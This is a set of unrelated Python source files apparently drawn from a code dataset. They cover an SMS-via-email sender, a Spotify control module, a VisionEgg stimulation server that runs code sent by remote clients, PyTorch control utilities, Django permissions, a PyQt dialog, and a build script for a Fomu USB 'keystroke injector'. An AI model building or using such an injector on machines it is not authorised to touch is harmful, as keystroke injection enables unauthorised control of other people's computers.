yagmail_args.insert(0, username)
yagmail_args.insert(1, password)
## Init the yagmail connection
try:
self.connection = yagmail.SMTP(*yagmail_args)
except Exception as e:
## You might want to look into using an app password for this.
self._print_error(e, "Unhandled error creating yagmail connection.")
return
## Send the mail if the contents arg has been provided, otherwise
## the send() method can be called manually.
if(contents):
self.send(contents)
## Methods
def _print_error(self, exception, message=None):
output = []
if(exception):
output.append(str(exception))
if(message):
output.append(str(message))
if(output):
joined = " ".join(output)
## Inefficient logic to aid in testing
if(not self.config["quiet"]):
print(joined)
return joined
else:
return None
def _load_gateways(self):
with open(self.GATEWAYS_JSON_PATH, "r") as fd:
try:
return json.load(fd)[self.GATEWAYS_KEY]
except Exception as e:
self._print_error(e, "Unhandled error loading gateways.json.")
return []
def _validate_number(self, number, region):
number = str(number).strip()
try:
parsed = phonenumbers.parse(number, region)
except phonenumbers.phonenumberutil.NumberParseException as e:
self._print_error(e, "NumberParseException when parsing the phone number.")
return False
except Exception as e:
self._print_error(e, "Unhandled error when parsing the phone number.")
return False
else:
if (phonenumbers.is_possible_number(parsed) and
phonenumbers.is_valid_number(parsed)):
return True
else:
self._print_error(None, "'{0}' isn't a valid phone number".format(number))
return False
def _validate_carrier(self, carrier):
carrier = str(carrier).strip()
for gateway in self.gateways:
if(gateway[self.CARRIER_KEY] == carrier):
return True
else:
self._print_error(None, "'{0}' isn't a valid carrier.".format(carrier))
return False
def _get_gateway(self, carrier):
for gateway in self.gateways:
if(gateway[self.CARRIER_KEY] == carrier):
if(self.config.get("mms")):
## Return mms gateway if possible, else return the sms gateway
if(self.MMS_KEY in gateway):
return gateway[self.MMS_KEY]
elif(self.SMS_KEY in gateway):
return gateway[self.SMS_KEY]
else:
## Return sms gateway if possible, else return the mms gateway
if(self.SMS_KEY in gateway):
return gateway[self.SMS_KEY]
elif(self.MMS_KEY in gateway):
return gateway[self.MMS_KEY]
else:
## This shouldn't happen.
self._print_error(None, "Carrier '{0}' doesn't have any valid SMS or MMS gateways.".format(carrier))
return None
def _build_address(self, number, carrier):
## Load and ensure that there are gateways to check
self.gateways = self._load_gateways()
if(not self.gateways):
return None
## Validate the phone number and carrier
if (not self._validate_number(number, self.config["region"]) or
not self._validate_carrier(carrier)):
return None
## Get the SMS/MMS gateway for the carrier
gateway = self._get_gateway(carrier)
if(not gateway):
return None
return "{0}@{1}".format(number, gateway)
def send(self, contents):
## Prepare kwargs for yagmail.send()
yagmail_kwargs = {
"to": self.address,
"subject": self.config["subject"],
"contents": contents
}
## Send the mail
try:
self.connection.send(**yagmail_kwargs)
except Exception as e:
self._print_error(e, "Unhandled error sending mail.")
return False
else:
return True
|
nilq/baby-python
|
python
|
from google.cloud import storage
bucket_name = "ml_model_store"
storage_client = storage.Client()
storage_client.create_bucket(bucket_name)
for bucket in storage_client.list_buckets():
print(bucket.name)
|
nilq/baby-python
|
python
|
from Domo.Modules import *
from Domo.API import ApiManager, ApiResponse, ApiCodes
from System.Collections.Generic import Dictionary
from System.Drawing import Point, Color, Size, Brush, SolidBrush
from System.Threading import Thread, ThreadStart
from System.Windows.Forms import (
Application,
Form,
DialogResult,
MethodInvoker,
Timer,
Label,
Button,
NumericUpDown,
ColorDialog,
TrackBar,
)
class SpotifyForm(TriggerModule):
form = None
def __init__(self):
pass
def OnEnable(self):
TriggerModule.init(self, SpotifySensor, SpotifyController)
ApiManager.RegisterListener("spotify", self.apiListener)
if self.controller.hardwareInterface.isInitialized:
self.formThread = None
self.formThread = Thread(ThreadStart(self.CreateForm))
self.formThread.Start()
pass
def OnDisable(self):
if self.form is not None and self.form.Visible:
self.form.Invoke(MethodInvoker(self.form.Close))
if self.formThread is not None:
self.formThread.Abort()
self.form = None
pass
def CreateForm(self):
self.form = SpotifyTestForm(self.sensor, self.controller)
Application.Run(self.form)
pass
def apiListener(self, request):
if request.arguments.ContainsKey("action"):
action = str(request.arguments["action"])
if action == "status":
return ApiResponse.Success(Dictionary[str, object](self.sensor.status))
elif action == "play":
if request.arguments.ContainsKey("track"):
self.controller.play(request.arguments["track"])
else:
self.controller.play()
elif action == "unpause" or action == "resume":
self.controller.unpause()
elif action == "pause":
self.controller.pause()
else:
return ApiResponse.Failed(ApiCodes.NotEnoughData, "The provided action was not recognized (action={0})".format(action))
return ApiResponse.Success()
else:
return ApiResponse.Failed(ApiCodes.NotEnoughData, "There is no action defined")
pass
class SpotifyTestForm(Form):
def __init__(self, sensor, controller):
self.Text = "Spotify Controls"
self.Name = "Test"
self.sensor = sensor
self.controller = controller
self.createControls()
self.startTimerLoop()
pass
def createControls(self):
l = Label()
l.Text = "Is Playing:"
l.Location = Point(10, 10)
self.Controls.Add(l)
self.playingLabel = Label()
self.playingLabel.Text = "false"
self.playingLabel.Location = Point(110, 10)
self.Controls.Add(self.playingLabel)
l = Label()
l.Text = "Track:"
l.Location = Point(10, 35)
self.Controls.Add(l)
self.trackLabel = Label()
self.trackLabel.Text = ""
self.trackLabel.Location = Point(110, 35)
self.trackLabel.Size = Size(150, 25)
self.Controls.Add(self.trackLabel)
l = Label()
l.Text = "Artist:"
l.Location = Point(10, 60)
self.Controls.Add(l)
self.artistLabel = Label()
self.artistLabel.Text = ""
self.artistLabel.Location = Point(110, 60)
self.artistLabel.Size = Size(150, 25)
self.Controls.Add(self.artistLabel)
b = Button()
b.Text = "Play"
b.Location = Point(10, 85)
b.Click += self.playClicked
self.Controls.Add(b)
b = Button()
b.Text = "Pause"
b.Location = Point(110, 85)
b.Click += self.pauseClicked
self.Controls.Add(b)
pass
def startTimerLoop(self):
timer = Timer()
timer.Interval = 2000
timer.Tick += self.timerTick
timer.Start()
pass
def timerTick(self, *args):
self.updateStatus()
pass
def playClicked(self, *args):
self.controller.play()
self.updateStatus()
pass
def pauseClicked(self, *args):
self.controller.pause()
self.updateStatus()
pass
def updateStatus(self):
self.playingLabel.Text = str(self.sensor.isPlaying).lower()
self.trackLabel.Text = self.sensor.track
self.artistLabel.Text = self.sensor.artist
pass
|
nilq/baby-python
|
python
|
# Stimulation server extended from VisionEgg.PyroApps.EPhysServer
from distutils.version import LooseVersion as V
import os
import ast
import Pyro
import pickle
import logging
import pygame
import VisionEgg
import VisionEgg.PyroApps.EPhysServer as server
from StimControl.LightStim.Core import DefaultScreen
from StimControl.LightStim.LightData import dictattr
from VisionEgg.PyroHelpers import PyroServer
from VisionEgg.PyroApps.DropinServer import DropinMetaController
from VisionEgg.PyroApps.DropinGUI import DropinMetaParameters
class MyDropinMetaController(DropinMetaController):
def __init__(self,screen,presentation,stimuli):
Pyro.core.ObjBase.__init__(self)
self.meta_params = DropinMetaParameters()
self.p = presentation
class Targets(object):
def __init__(self, targets_list):
self.targets = targets_list
def __eq__(self,other):
if len(self.targets)!=len(other.targets):
return False
for i in range(len(other.targets)):
if not self.equal_target(self.targets[i],other.targets[i]):
return False
return True
def equal_target(self, left, right):
if isinstance(left, ast.Attribute) and isinstance(right, ast.Attribute):
return self.equal_target(left.value, right.value) and left.attr == right.attr
if isinstance(left, ast.Name) and isinstance(right, ast.Name):
return left.id == right.id
return False
class ModAssignments(ast.NodeTransformer):
def __init__(self, assign_exp):
ast.NodeTransformer.__init__(self)
self.new_assign = ast.parse(assign_exp).body[0]
def visit_Assign(self, node):
if Targets(node.targets) == Targets(self.new_assign.targets):
node.value = self.new_assign.value
return node
class RTEPhysServer(server.EPhysServer):
"""
TODO: exec_AST should be interruptable from client side.
"""
def __init__(self, *args,**kwargs):
server.EPhysServer.__init__(self,*args,**kwargs)
### hacking here to suppress annoying prints in log ###
self.stimdict['dropin_server'] = (MyDropinMetaController, self.stimdict['dropin_server'][1])
#######################################################
self.really_quit_server = False
self.AST_tree_completed = False
self.logpath = 'stimlog'
if not os.path.exists(self.logpath):
os.makedirs(self.logpath)
def build_AST(self, source, assignments=[]):
AST = ast.parse(source)
for assign in assignments:
AST = ModAssignments(assign).visit(AST)
self.AST = AST
self.AST_tree_completed = True
def exec_AST(self, screen):
code_module = compile(self.AST, '', 'exec')
exec code_module in locals()
if 'p' in locals() and isinstance(locals()['p'], VisionEgg.FlowControl.Presentation):
presentation = locals()['p']
elif 'sweep' in locals() and isinstance(locals()['sweep'], VisionEgg.FlowControl.Presentation):
presentation = locals()['sweep']
else:
raise RuntimeError('Cannot find presentation instance in locals().')
self.script_dropped_frames = presentation.were_frames_dropped_in_last_go_loop()
self.presentation.last_go_loop_start_time_absolute_sec = presentation.last_go_loop_start_time_absolute_sec # evil hack...
self.exec_demoscript_flag = False
self.set_quit_status(False)
def _set_parameters(self, dest_params, source_params):
for paramname, paramval in source_params.items():
setattr(dest_params, paramname, paramval)
def is_AST_tree_completed(self):
return self.AST_tree_completed
def set_AST_tree_to_build(self):
self.AST_tree_completed = False
def get_stimulus_params(self,eye,index=0):
logger = logging.getLogger('StimControl.StimServer')
params = dictattr()
with open('stimulus_params.pkl','rb') as pkl_input:
pkl_params = pickle.load(pkl_input)
try:
self._set_parameters(params, pkl_params[eye][index])
except:
logger.error("Cannot get stimulus params for % eye." % eye)
return None
else:
return params
def send_stimulus_params(self, eye, params):
try:
with open('stimulus_params.pkl','rb') as pkl_input:
preferences_dict = pickle.load(pkl_input)
if eye not in preferences_dict:
preferences_dict[eye] = [{}] * 2
with open('stimulus_params.pkl','wb') as pkl_output:
preferences_dict[eye][0].update(params)
pickle.dump(preferences_dict, pkl_output)
except:
raise RuntimeError('Cannot save params for ' + eye + 'viewport.')
def log_stimulus(self, exp_name):
# logging stimulus
logfile = self.logpath + os.path.sep + exp_name + '.log'
log_formatter = logging.Formatter('%(asctime)s (%(process)d) %(levelname)s: %(message)s')
log_handler_logfile = logging.FileHandler(logfile)
log_handler_logfile.setFormatter(log_formatter)
lightstim_logger = logging.getLogger('VisionEgg')
lightstim_logger.setLevel( logging.INFO )
lightstim_logger.addHandler(log_handler_logfile)
lightstim_logger = logging.getLogger('LightStim')
lightstim_logger.setLevel( logging.INFO )
lightstim_logger.addHandler(log_handler_logfile)
stimcontrol_logger = logging.getLogger('StimControl')
stimcontrol_logger.setLevel( logging.INFO )
stimcontrol_logger.addHandler(log_handler_logfile)
def get_stimulus_log(self, exp_name):
logfile = self.logpath + os.path.sep + exp_name + '.log'
with open(logfile) as log:
return log.readlines()
def is_running(self):
return self.exec_demoscript_flag
def set_quit_server_status(self, status):
self.really_quit_server = status
def quit_server_status(self):
return self.really_quit_server
def quit_presentation(self):
pass
class NewPyroServer(PyroServer):
def __init__(self):
Pyro.config.PYRO_MULTITHREADED = 1 # multithreading!
PyroServer.__init__(self)
def disconnect(self, _object):
try:
# pylint: disable=E1101
VERSION = Pyro.core.constants.VERSION
except:
VERSION = Pyro.constants.VERSION
if V(VERSION) >= V('3.2'):
self.daemon.disconnect(_object)
else:
# workaround bug in Pyro pre-3.2
del self.daemon.implementations[_object.GUID()]
_object.setDaemon(None)
class StimServer(object):
def __init__(self):
self.presentation = None
self.ephys_server = None
self.server_modules = [VisionEgg.PyroApps.DropinServer]
def start_server(self):
pyro_server = NewPyroServer()
default_viewports = ['left','right']
DefaultScreen(default_viewports)
screen = DefaultScreen.screen
perspective_viewport = VisionEgg.Core.Viewport(screen=screen)
overlay2D_viewport = VisionEgg.Core.Viewport(screen=screen)
self.presentation = VisionEgg.FlowControl.Presentation(viewports=[perspective_viewport, overlay2D_viewport]) # 2D overlay on top
self.presentation.parameters.handle_event_callbacks = [(pygame.locals.KEYDOWN, self.keydown_callback)]
self.presentation.between_presentations() # draw wait_text
self.ephys_server = RTEPhysServer(self.presentation, self.server_modules)
pyro_server.connect(self.ephys_server,"ephys_server")
# get listener controller and register it
self.presentation.add_controller(None,None, pyro_server.create_listener_controller())
self.presentation.run_forever() # run until we get first connnection, which breaks out immmediately
while not self.ephys_server.quit_server_status():
if self.ephys_server.get_stimkey() == "dropin_server":
self.presentation.parameters.enter_go_loop = False
# wait for client side quit status
self.presentation.run_forever()
if self.ephys_server.quit_server_status():
break
if self.ephys_server.exec_demoscript_flag:
self.ephys_server.exec_AST(screen)
def keydown_callback(self,event):
if event.key == pygame.locals.K_q:
self.presentation.parameters.quit = True
self.ephys_server.set_quit_server_status(True)
if __name__ == '__main__':
stim_server = StimServer()
stim_server.start_server()
|
nilq/baby-python
|
python
|
import torch
from torch.autograd import Function, Variable
from torch.nn import Module
from torch.nn.parameter import Parameter
import operator
def jacobian(f, x, eps):
if x.ndimension() == 2:
assert x.size(0) == 1
x = x.squeeze()
e = Variable(torch.eye(len(x)).type_as(get_data_maybe(x)))
J = []
for i in range(len(x)):
J.append((f(x + eps*e[i]) - f(x - eps*e[i]))/(2.*eps))
J = torch.stack(J).transpose(0,1)
return J
def expandParam(X, n_batch, nDim):
if X.ndimension() in (0, nDim):
return X, False
elif X.ndimension() == nDim - 1:
return X.unsqueeze(0).expand(*([n_batch] + list(X.size()))), True
else:
raise RuntimeError("Unexpected number of dimensions.")
def bdiag(d):
assert d.ndimension() == 2
nBatch, sz = d.size()
dtype = d.type() if not isinstance(d, Variable) else d.data.type()
D = torch.zeros(nBatch, sz, sz).type(dtype)
I = torch.eye(sz).repeat(nBatch, 1, 1).type(dtype).byte()
D[I] = d.view(-1)
return D
def bger(x, y):
return x.unsqueeze(2).bmm(y.unsqueeze(1))
def bmv(X, y):
return X.bmm(y.unsqueeze(2)).squeeze(2)
def bquad(x, Q):
return x.unsqueeze(1).bmm(Q).bmm(x.unsqueeze(2)).squeeze(1).squeeze(1)
def bdot(x, y):
return torch.bmm(x.unsqueeze(1), y.unsqueeze(2)).squeeze(1).squeeze(1)
def eclamp(x, lower, upper):
# In-place!!
if type(lower) == type(x):
assert x.size() == lower.size()
if type(upper) == type(x):
assert x.size() == upper.size()
I = x < lower
x[I] = lower[I] if not isinstance(lower, float) else lower
I = x > upper
x[I] = upper[I] if not isinstance(upper, float) else upper
return x
def get_data_maybe(x):
return x if not isinstance(x, Variable) else x.data
_seen_tables = []
def table_log(tag, d):
# TODO: There's probably a better way to handle formatting here,
# or a better way altogether to replace this quick hack.
global _seen_tables
def print_row(r):
print('| ' + ' | '.join(r) + ' |')
if tag not in _seen_tables:
print_row(map(operator.itemgetter(0), d))
_seen_tables.append(tag)
s = []
for di in d:
assert len(di) in [2,3]
if len(di) == 3:
e, fmt = di[1:]
s.append(fmt.format(e))
else:
e = di[1]
s.append(str(e))
print_row(s)
def get_traj(T, u, x_init, dynamics):
from .mpc import QuadCost, LinDx # TODO: This is messy.
if isinstance(dynamics, LinDx):
F = get_data_maybe(dynamics.F)
f = get_data_maybe(dynamics.f)
if f is not None:
assert f.shape == F.shape[:3]
x = [get_data_maybe(x_init)]
for t in range(T):
xt = x[t]
ut = get_data_maybe(u[t])
if t < T-1:
# new_x = f(Variable(xt), Variable(ut)).data
if isinstance(dynamics, LinDx):
xut = torch.cat((xt, ut), 1)
new_x = bmv(F[t], xut)
if f is not None:
new_x += f[t]
else:
new_x = dynamics(Variable(xt), Variable(ut)).data
x.append(new_x)
x = torch.stack(x, dim=0)
return x
def get_cost(T, u, cost, dynamics=None, x_init=None, x=None):
from .mpc import QuadCost, LinDx # TODO: This is messy.
assert x_init is not None or x is not None
if isinstance(cost, QuadCost):
C = get_data_maybe(cost.C)
c = get_data_maybe(cost.c)
if x is None:
x = get_traj(T, u, x_init, dynamics)
objs = []
for t in range(T):
xt = x[t]
ut = u[t]
xut = torch.cat((xt, ut), 1)
if isinstance(cost, QuadCost):
obj = 0.5*bquad(xut, C[t]) + bdot(xut, c[t])
else:
obj = cost(xut)
objs.append(obj)
objs = torch.stack(objs, dim=0)
total_obj = torch.sum(objs, dim=0)
return total_obj
def detach_maybe(x):
if x is None:
return None
return x if not x.requires_grad else x.detach()
def data_maybe(x):
if x is None:
return None
return x.data
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright (C) 2021 Antmicro
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# SPDX-License-Identifier: Apache-2.0
LX_DEPENDENCIES = ["riscv", "icestorm", "yosys", "nextpnr-ice40"]
# Import lxbuildenv to integrate the deps/ directory
import lxbuildenv
import os, os.path, sys
import argparse
from migen import *
from migen.genlib.resetsync import AsyncResetSynchronizer
from litex.soc.integration.builder import *
from litex.soc.integration.soc import SoCRegion
from litex_boards.targets.kosagi_fomu import BaseSoC
from valentyusb.usbcore import io as usbio
from valentyusb.usbcore.cpu import eptri
from rtl.fomurgb import FomuRGB
from rtl.fomutouch import FomuTouch
from dfu import *
from autoboot import *
kB = 1024
def main():
## Read and parse arguments
parser = argparse.ArgumentParser(
description="Fomu Keystroke Injector - gateware/BIOS builder"
)
parser.add_argument(
"--seed", default=1, help="Seed to use in nextpnr"
)
parser.add_argument(
"--timeout", default=1, help="Timeout until Foboot switches to injector gateware"
)
builder_args(parser)
args = parser.parse_args()
## Image layout
binaries = {
# name, path, size
"bitstream": ["{build_dir}/gateware/{build_name}.bin", 0x20000], # 0x0
"bios": ["{build_dir}/software/bios/bios.bin", 0x08000], # 0x20000
"firmware": ["{build_dir}/software/firmware/firmware.fbi", 0x10000], # 0x28000
}
## Flash layout:
flash_offset_bitstream = 0x40000
flash_offset_bios = flash_offset_bitstream + binaries["bitstream"][1]
flash_offset_firmware = flash_offset_bios + binaries["bios"][1]
flash_offset_script = flash_offset_firmware + binaries["firmware"][1]
## Create SoC
soc = BaseSoC(bios_flash_offset=flash_offset_bios,
cpu_type="vexriscv", cpu_variant="minimal",
with_uart=False, with_led_chaser=False, with_spi_master=True
)
# Add LED driver block
rgb_pins = soc.platform.request("rgb_led")
soc.submodules.rgb = FomuRGB(rgb_pins)
soc.add_csr("rgb")
# Add touch buttons
touch_pins = [soc.platform.request("user_touch_n", i) for i in range (0, 4)]
soc.submodules.touch = FomuTouch(touch_pins)
soc.add_csr("touch")
# Add USB device controller
usb_pads = soc.platform.request('usb')
usb_iobuf = usbio.IoBuf(usb_pads.d_p, usb_pads.d_n, usb_pads.pullup)
soc.submodules.usb = eptri.TriEndpointInterface(usb_iobuf)
soc.add_interrupt("usb")
# BIOS/software constants
soc.add_constant("CONFIG_SIM_DISABLE_BIOS_PROMPT")
soc.add_constant("SPIFLASH_SKIP_FREQ_INIT")
soc.add_constant("TERM_MINI")
soc.add_constant("TERM_NO_HIST")
# Application must be running from RAM to be able to write data to SPI flash
soc.add_constant("MAIN_RAM_ADDRESS", soc.mem_map["main_ram"])
soc.add_constant("PART_GFS", flash_offset_bitstream)
soc.add_constant("FLASH_BOOT_ADDRESS", soc.mem_map["spiflash"] + flash_offset_firmware)
soc.add_constant("PART_SCRIPT", flash_offset_script)
# Build final SoC
builder = Builder(soc, **builder_argdict(args))
if not args.no_compile_software:
builder.add_software_package("firmware", os.path.abspath(os.path.join(os.path.dirname(__file__), "..", "sw")))
builder.build(seed=args.seed)
if not args.no_compile_gateware:
# Set autoboot parameter
if autoboot_timeout(os.path.join(builder.output_dir, "gateware", f"{soc.platform.name}.bin"), args.timeout):
print("Autoboot timeout set to {} sec".format(args.timeout))
else:
print("Couldn't set autoboot timeout")
# Merge gateware and firmware into single binary
merge_image(binaries, builder.output_dir, soc.platform.name)
# Add DFU suffix to the final binary
vid = '5bf0'
pid = '1209'
add_dfu_suffix(os.path.join(builder.output_dir, f"{soc.platform.name}.bin"), vid, pid)
if __name__ == "__main__":
main()
|
nilq/baby-python
|
python
|
from django.conf import settings
from django.contrib.auth import get_user_model
from django.core.mail import send_mail
class Permissions:
"""This is the base class for all custom permissions. To create a new permission set, subclass
this class."""
def __init__(self, model_name, app_label):
self.model_name = model_name.lower()
self.app_label = app_label
@classmethod
def from_model(cls, model):
return cls(model.__name__, model._meta.app_label)
def _template(self, action, detail=None, full=False, codename_only=True):
"""This method defines a common permission template which all permissions use and
should only be called by subclasses.
Parameters:
action (str): The action with which this permission is associated. Should be
all lower-case and snake-case.
detail (str): Additional detail about how the action and model are related. Should be
all lower-case snake-case.
full (bool): Whether the full permission name should be used (i.e. app name prepended)
codename_only (bool): Whether just the codename should be returned
Returns:
str or (str, str): Either the codename or (codename, name), depending on the
codename_only parameter
"""
model, prefix = self.model_name, f'{self.app_label}.' if full else ''
detail = '_' + detail if detail else '' # Prepend '_' if detail was provided
codename = f'{prefix}{action}_{model}{detail}'
name = f'Can {action} {model}{" ".join(detail.split("_"))}'
return codename if codename_only else (codename, name)
def all(self, full=False, codename_only=False):
"""Gets a list of all permissions"""
def is_permission(attr_name):
"""Returns true if attr_name refers to a permission method"""
attr = getattr(self.__class__, attr_name)
if callable(attr) and attr_name != 'all':
# True if attr is 1) not private and 2) not a class method
return not attr_name.startswith('_') and not hasattr(attr, '__self__')
return False
return [getattr(self, attr)(full, codename_only) for attr in dir(self.__class__) if is_permission(attr)]
class StatusPermissions(Permissions):
"""Permissions having to do with the status of an object."""
def change_needs_review(self, full=False, codename_only=True):
return self._template('change', 'needs_review', full=full, codename_only=codename_only)
def change_in_production(self, full=False, codename_only=True):
return self._template('change', 'in_production', full=full, codename_only=codename_only)
def reject_needs_review(self, full=False, codename_only=True):
return self._template('reject', 'needs_review', full=full, codename_only=codename_only)
def remove_from_production(self, full=False, codename_only=True):
return self._template('remove', 'from_production', full=full, codename_only=codename_only)
def push_to_production(self, full=False, codename_only=True):
return self._template('push', 'to_production', full=full, codename_only=codename_only)
class StatusEmail:
def __init__(self, obj):
self.obj = obj
self.model_name = obj.__class__.__name__
self.perms = StatusPermissions(self.model_name)
def needs_review(self):
perm = self.perms.change_needs_review(full=True)
users = get_user_model().objects.all()
recipients = [user.email for user in users if user.has_perm(perm)]
send_mail(
f'{self.model_name} needs review',
f'The {self.model_name.lower()} {self.obj} is ready for review.',
settings.STATUS_CHANGE_EMAIL_FROM,
recipients
)
def remove_from_production(self):
perm = self.perms.change_needs_review(full=True)
users = get_user_model().objects.all()
recipients = [user.email for user in users if not user.has_perm(perm)]
send_mail(
f'{self.model_name} removed from production',
f'The {self.model_name.lower()} {self.obj} has a problem and has been removed from production.',
settings.STATUS_CHANGE_EMAIL_FROM,
recipients
)
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ui_send_payout_dlg.ui'
#
# Created by: PyQt5 UI code generator 5.9.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_SendPayoutDlg(object):
def setupUi(self, SendPayoutDlg):
SendPayoutDlg.setObjectName("SendPayoutDlg")
SendPayoutDlg.resize(832, 507)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(SendPayoutDlg.sizePolicy().hasHeightForWidth())
SendPayoutDlg.setSizePolicy(sizePolicy)
SendPayoutDlg.setSizeGripEnabled(True)
SendPayoutDlg.setModal(True)
self.verticalLayout = QtWidgets.QVBoxLayout(SendPayoutDlg)
self.verticalLayout.setObjectName("verticalLayout")
self.pnl_input = QtWidgets.QWidget(SendPayoutDlg)
self.pnl_input.setObjectName("pnl_input")
self.verticalLayout_4 = QtWidgets.QVBoxLayout(self.pnl_input)
self.verticalLayout_4.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_4.setSpacing(0)
self.verticalLayout_4.setObjectName("verticalLayout_4")
self.lay_input = QtWidgets.QHBoxLayout()
self.lay_input.setSpacing(8)
self.lay_input.setObjectName("lay_input")
self.label_3 = QtWidgets.QLabel(self.pnl_input)
self.label_3.setObjectName("label_3")
self.lay_input.addWidget(self.label_3)
self.cbo_address_source_mode = QtWidgets.QComboBox(self.pnl_input)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.cbo_address_source_mode.sizePolicy().hasHeightForWidth())
self.cbo_address_source_mode.setSizePolicy(sizePolicy)
self.cbo_address_source_mode.setMinimumSize(QtCore.QSize(0, 0))
self.cbo_address_source_mode.setMaximumSize(QtCore.QSize(160, 16777215))
self.cbo_address_source_mode.setObjectName("cbo_address_source_mode")
self.cbo_address_source_mode.addItem("")
self.cbo_address_source_mode.addItem("")
self.cbo_address_source_mode.addItem("")
self.lay_input.addWidget(self.cbo_address_source_mode)
self.sw_address_source = QtWidgets.QStackedWidget(self.pnl_input)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.sw_address_source.sizePolicy().hasHeightForWidth())
self.sw_address_source.setSizePolicy(sizePolicy)
self.sw_address_source.setObjectName("sw_address_source")
self.wdg_address_source_1 = QtWidgets.QWidget()
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.wdg_address_source_1.sizePolicy().hasHeightForWidth())
self.wdg_address_source_1.setSizePolicy(sizePolicy)
self.wdg_address_source_1.setObjectName("wdg_address_source_1")
self.horizontalLayout_6 = QtWidgets.QHBoxLayout(self.wdg_address_source_1)
self.horizontalLayout_6.setContentsMargins(0, 0, 0, 0)
self.horizontalLayout_6.setSpacing(1)
self.horizontalLayout_6.setObjectName("horizontalLayout_6")
self.lbl_account = QtWidgets.QLabel(self.wdg_address_source_1)
self.lbl_account.setObjectName("lbl_account")
self.horizontalLayout_6.addWidget(self.lbl_account)
self.cbo_hw_account_nr = QtWidgets.QComboBox(self.wdg_address_source_1)
self.cbo_hw_account_nr.setObjectName("cbo_hw_account_nr")
self.horizontalLayout_6.addWidget(self.cbo_hw_account_nr)
self.btn_add_hw_account_nr = QtWidgets.QToolButton(self.wdg_address_source_1)
self.btn_add_hw_account_nr.setObjectName("btn_add_hw_account_nr")
self.horizontalLayout_6.addWidget(self.btn_add_hw_account_nr)
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_6.addItem(spacerItem)
self.lbl_hw_account_base_path = QtWidgets.QLabel(self.wdg_address_source_1)
self.lbl_hw_account_base_path.setObjectName("lbl_hw_account_base_path")
self.horizontalLayout_6.addWidget(self.lbl_hw_account_base_path)
self.sw_address_source.addWidget(self.wdg_address_source_1)
self.wdg_address_source_2 = QtWidgets.QWidget()
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.wdg_address_source_2.sizePolicy().hasHeightForWidth())
self.wdg_address_source_2.setSizePolicy(sizePolicy)
self.wdg_address_source_2.setObjectName("wdg_address_source_2")
self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.wdg_address_source_2)
self.horizontalLayout_2.setContentsMargins(0, 0, 0, 0)
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.lblSourceBip32Path = QtWidgets.QLabel(self.wdg_address_source_2)
self.lblSourceBip32Path.setObjectName("lblSourceBip32Path")
self.horizontalLayout_2.addWidget(self.lblSourceBip32Path)
self.edt_src_bip32_path = QtWidgets.QLineEdit(self.wdg_address_source_2)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.edt_src_bip32_path.sizePolicy().hasHeightForWidth())
self.edt_src_bip32_path.setSizePolicy(sizePolicy)
self.edt_src_bip32_path.setMaximumSize(QtCore.QSize(100, 16777215))
self.edt_src_bip32_path.setStyleSheet("background-color: lightgray;")
self.edt_src_bip32_path.setReadOnly(True)
self.edt_src_bip32_path.setObjectName("edt_src_bip32_path")
self.horizontalLayout_2.addWidget(self.edt_src_bip32_path)
self.btn_src_bip32_path = QtWidgets.QToolButton(self.wdg_address_source_2)
self.btn_src_bip32_path.setObjectName("btn_src_bip32_path")
self.horizontalLayout_2.addWidget(self.btn_src_bip32_path)
spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_2.addItem(spacerItem1)
self.sw_address_source.addWidget(self.wdg_address_source_2)
self.wdg_address_source_3 = QtWidgets.QWidget()
self.wdg_address_source_3.setObjectName("wdg_address_source_3")
self.horizontalLayout = QtWidgets.QHBoxLayout(self.wdg_address_source_3)
self.horizontalLayout.setContentsMargins(0, 0, 0, 0)
self.horizontalLayout.setObjectName("horizontalLayout")
self.lbl_src_masternode = QtWidgets.QLabel(self.wdg_address_source_3)
self.lbl_src_masternode.setObjectName("lbl_src_masternode")
self.horizontalLayout.addWidget(self.lbl_src_masternode)
self.cbo_src_masternodes = QtWidgets.QComboBox(self.wdg_address_source_3)
self.cbo_src_masternodes.setObjectName("cbo_src_masternodes")
self.horizontalLayout.addWidget(self.cbo_src_masternodes)
spacerItem2 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem2)
self.sw_address_source.addWidget(self.wdg_address_source_3)
